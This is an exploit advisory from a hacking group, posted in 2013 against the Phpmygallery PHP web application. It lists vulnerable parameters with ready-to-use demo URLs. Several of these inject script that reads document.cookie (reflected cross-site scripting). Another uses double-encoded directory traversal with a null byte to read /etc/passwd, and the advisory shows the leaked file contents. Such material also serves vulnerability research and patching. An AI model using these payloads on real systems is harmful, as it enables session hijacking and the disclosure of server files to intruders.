#########################################################################
#     __              .__                            .__                #
#    |__|____    ____ |__| ______ ___________ _______|__| ____   ______ #
#    |  \__  \  /    \|  |/  ___//  ___/\__  \\_  __ \  |/ __ \ /  ___/ #
#    |  |/ __ \|   |  \  |\___ \ \___ \  / __ \|  | \/  \  ___/ \___ \  #
#/\__|  (____  /___|  /__/____  >____  >(____  /__|  |__|\___  >____  > #
#\______|    \/     \/        \/     \/      \/              \/     \/  #
#                                                 www.janissaries.org   #
##=====================================================================##  

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 «««:»»»       Phpmygallery -Multiple Vulnerabilities All Version       «««:»»»
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : Phpmygallery -Multiple Vulnerabilities All Version
 ./WebApps URL    :http://phpmygallery.kapierich.net
 ./WebApps Download  :http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.51.010.zip
 ./Scripts Version : 1.51.010 & All version
 ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com ] [ All Janissaries ]
 ./Security Risk : [ High Level ]
 ./Category XPL  : [ WebApps]
 ./Date   : 21.02.2013. 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 #################################################################################
 #_____________________________________________________#
 #[~] Xss on 
 # /_conf/?action=statistics&filename=[Code]
 # /_conf/?action=delsettings&group=[Code]
 # _conf/?action=mainsetup&group=&picdir=[Code]
  ###Demo Exploit
 # http://www.target.com/_conf/?action=statistics&filename=2011.10"><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
 # http://www.target.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
 # 
 #_____________________________________________________#
 #[~] Path Vulnerabilities  ON
 # /_conf/?action=delsettings&group=[Code]%2500.jpg&picdir=Sample_Gallery&what=descriptions
 # 
 ####Demo Exploit
 # http://www.target.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions
 #_____________________________________________________
 #                                                     #
			root:x:0:0:root:/root:/bin/bash
			bin:x:1:1:bin:/bin:/bin/false
			daemon:x:2:2:daemon:/sbin:/bin/false
			adm:x:3:4:adm:/var/adm:/bin/false
			lp:x:4:7:lp:/var/spool/lpd:/bin/false
			sync:x:5:0:sync:/sbin:/bin/sync
 #_____________________________________________________# 
 # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
 # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
 #################################################################################